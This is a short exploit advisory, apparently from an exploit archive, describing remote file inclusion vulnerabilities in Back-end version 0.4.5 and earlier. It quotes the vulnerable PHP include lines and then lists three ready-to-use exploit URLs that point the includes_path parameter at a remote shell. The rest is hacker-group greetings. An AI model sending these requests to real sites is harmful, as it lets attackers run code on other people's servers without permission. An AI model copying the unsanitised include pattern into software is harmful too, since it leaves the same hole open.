Back-end versions 0.4.5 and prior suffer from several remote file inclusion vulnerabilities.
23207fd8a3e913ac065914d4cc5975acb17a3d25e1bdb3299716e4f0405e9cb8
# Back-end => 0.4.5 Remote File Include Vulnerabilities
# Script.............. :Back-end
# Discovered By.... : Root3r_H3ll
# Location .......... : Iran
# Class.............. : Remote
# Original Advisory : http://Www.PersainFox.com
# We ArE : Root3r_H3LL & Arash.Rj
# <Spical TNX Irania Hackers :
( Aria-Security , Crouz , DeltaHacking , Iranhackers
Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev )
# </\/\\/_ 10\/3 15 1|)\4/\/
|)\0073|)\_|-|311
# CodEs :
require($includes_path . "/includes.inc");
include ($includes_path . "/template_includes.inc");
include( $includes_path . "/search.inc");
# ExPloit :
Www.Site.coM/[Path]/admin/index.php?includes_path=Sh3ll
Www.Site.coM/[Path]/Facts.php?includes_path=Sh3ll
Www.Site.coM/[Path]/search.php?includes_path=Sh3ll